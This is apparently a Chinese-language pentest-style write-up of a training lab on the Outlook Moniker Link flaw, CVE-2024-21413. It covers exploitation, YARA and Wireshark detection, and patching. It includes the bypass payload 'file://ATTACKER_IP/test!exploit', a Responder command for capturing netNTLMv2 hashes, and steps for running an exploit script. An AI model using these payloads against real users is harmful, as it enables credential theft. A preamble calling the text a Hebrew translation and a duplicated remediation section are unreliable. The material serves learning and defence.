
2024年2月13日,微软发布了一个关于Microsoft Outlook的严重安全漏洞,编号为CVE-2024-21413,被称为Moniker Link漏洞。该漏洞允许攻击者绕过Outlook的受保护视图机制。

非常好 👍 以下是完整翻译+渗透测试报告格式,专业且清晰的希伯来语。 如您所要求的——仅翻译和格式。 您将自行添加答案、截图和补充,如需后续帮助,我会协助。
2024年2月13日,微软发布了一个关于Microsoft Outlook的严重安全漏洞,编号为 CVE-2024-21413,被称为Moniker Link漏洞。
该漏洞允许攻击者绕过Outlook的受保护视图机制,利用特殊链接(Moniker Link),导致受害者的Outlook客户端向攻击者控制的服务器发送登录凭据(NTLM哈希)——无需运行文件且无有效安全警告。
该漏洞可能导致凭据泄露,甚至理论上可能远程执行代码(RCE)。
| 参数 | 值 |
|---|
| 漏洞编号 | CVE-2024-21413 |
| 公布日期 | 2024年2月13日 |
| 发现者 | Haifei Li – Check Point Research |
| 影响 | 凭据泄露 + 潜在RCE |
| 严重程度 | 严重 |
| 攻击复杂度 | 低 |
| CVSS评分 | 9.8 |
| 官方链接 | https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413 |
该漏洞影响以下版本:
(漏洞描述)

Microsoft Outlook支持以HTML格式显示邮件,并分析各种类型的链接,例如http://和https://。此外,Outlook还支持一种称为Moniker Links的特殊链接,该类链接允许启动应用程序或访问操作系统中的外部资源。
正常情况下,当邮件包含一个启动外部应用程序或访问系统资源(如file://链接)的链接时,Outlook会激活受保护视图安全机制。该机制会显示安全警告并阻止危险操作,如运行代码、宏或访问外部网络资源。
然而,在Outlook中发现了一个漏洞(CVE-2024-21413),该漏洞允许通过简单操作Moniker Link来绕过受保护视图机制。
我们发现的问题(Findings)
在测试过程中发现,使用普通链接如:
file://ATTACKER_IP/test
会导致Outlook尝试通过SMB协议访问网络资源,但此尝试被受保护视图阻止。
相比之下,当链接包含特殊字符!和额外的文本字符串时,例如:
file://ATTACKER_IP/test!exploit
Outlook不会触发受保护视图,而是执行到远程服务器的连接尝试。
在此次尝试中:
Outlook尝试通过SMB访问资源
自动进行身份验证请求
用户的登录凭据被发送给攻击者
捕获到受害者的Windows netNTLMv2哈希
值得注意的是,远程共享不一定实际存在,因为身份验证尝试无论如何都会发生。
影响(Impact)
该漏洞允许攻击者:
泄露用户凭据(netNTLMv2哈希)
执行离线攻击(破解/传递哈希)
在企业网络中进行横向移动
此外,由于Moniker Links使用Windows的COM(组件对象模型)机制,理论上存在远程代码执行(RCE)的可能性。不过,截至测试时,尚未有公开的PoC实现利用此漏洞的实际RCE。
利用漏洞(Exploitation)
在攻击过程中,向受害者发送一封包含Moniker Link的邮件,该链接类似于之前任务中展示的。 攻击者的目标是创建一封包含Moniker Link的邮件,该链接绕过Outlook的受保护视图机制,以便受害者点击链接后,其Outlook客户端尝试从攻击者机器加载文件。此操作导致受害者的netNTLMv2哈希被发送并被攻击者捕获。
在执行攻击之前,我们将回顾一个演示用的PoC(也可在GitHub上获取)。
作者:CMNatic | https://github.com/cmnatic 版本:1.0 | 2024年2月19日
该代码使用Python语言,发送一封包含恶意Moniker Link的HTML邮件。
PoC描述
该PoC:
接收攻击者邮件地址和受害者邮件地址
需要SMTP认证密码 (在此房间中,[email protected]的密码为:attacker)
包含邮件的HTML内容(html_content),其中嵌入恶意Moniker Link
设置邮件字段:Subject、From、To
通过邮件服务器发送邮件
在真实场景中,需要攻击者控制的SMTP服务器(此房间中服务器已提供)。
监听捕获哈希 – Responder
发送邮件后,需要在攻击者机器上启动Responder监听工具,以捕获SMB请求。
在THM AttackBox中,接口名称为ens5:
responder -I ens5
Responder监听SMB、LLMNR和NBT-NS请求,并允许捕获身份验证凭据。
打开受害者机器
通过分屏窗口打开受害者机器
启动Outlook
选择“我不想登录或创建帐户”
关闭产品密钥输入窗口
受害者的邮箱已预先配置
运行漏洞利用(Exploit)
在AttackBox上:
创建新文件exploit.py
将PoC代码粘贴进去
运行前需进行调整:
更新Moniker Link中的攻击者IP地址(第12行)
将MAILSERVER地址替换为:
10.64.165.67
然后运行:
python3 exploit.py
当提示输入密码时,输入:
attacker
如果操作成功,将收到消息:
Email delivered
结果
在受害者机器上打开邮件并点击链接“Click me”后:
Outlook尝试通过SMB连接攻击者机器
Responder捕获到身份验证尝试
成功捕获用户的netNTLMv2哈希
攻击成功完成。

检测(Detection)
YARA
Florian Roth创建了一个YARA规则,旨在检测包含Moniker Link中file:\元素的邮件——这可能表明尝试利用CVE-2024-21413。
YARA规则示例(如房间中所示):
该规则搜索邮件的一般特征(如Subject:和Received:)
此外,还搜索可疑的file://链接模式,指向UNC路径(\)以及常见文件扩展名,包括末尾的!字符(受保护视图绕过的特征)
(代码本身保持原样)
Wireshark
此外,可以在Wireshark的数据包捕获中看到从受害者机器到攻击者机器的SMB请求。
在请求过程中:
执行SMB身份验证尝试
可以识别出netNTLMv2哈希(有时被截断)
缓解措施(Remediation)
微软在2月Patch Tuesday更新中包含了修复此漏洞的安全更新。 可以根据Office版本在微软官方链接中查看相关的KB文章列表。
强烈建议通过以下方式更新Microsoft Office:
Windows Update
Microsoft Update Catalog
此外,在完成所有系统更新之前,这是一个提醒,需要实施基本的信息安全措施,特别是提高用户意识,例如:
不点击随机链接,尤其是来自意外邮件的链接
在点击前预览链接地址
将可疑邮件报告给组织内的安全负责人
由于此漏洞绕过了Outlook的受保护视图机制,无法仅通过Outlook配置更改来阻止此攻击。
同样,完全阻止SMB协议在大多数组织中并不推荐,因为该协议对于访问网络资源和文件共享至关重要。不过,可以根据企业策略和网络结构,在防火墙级别实施阻止或限制。
缓解措施(Remediation)
微软在2月Patch Tuesday更新中包含了针对此漏洞的安全修复。 可以根据Office版本在微软官方链接中查看相关的KB文章列表。 强烈建议通过以下方式更新Microsoft Office:
Windows Update
Microsoft Update Catalog
此外,在完成所有系统更新之前,这是一个提醒,需要实施基本的信息安全措施,特别是提高用户意识,例如:
避免点击随机链接,尤其是来自意外邮件的链接
在点击前检查链接地址(预览)
将可疑邮件报告给组织内的安全负责人
由于此漏洞绕过了Outlook的受保护视图机制,无法仅通过Outlook自身的配置更改来阻止此攻击。
同样,完全阻止SMB协议在大多数组织中并不推荐,因为该协议对于访问文件共享和网络资源至关重要。不过,可以根据安全策略和企业网络结构,在防火墙级别实施限制或阻止。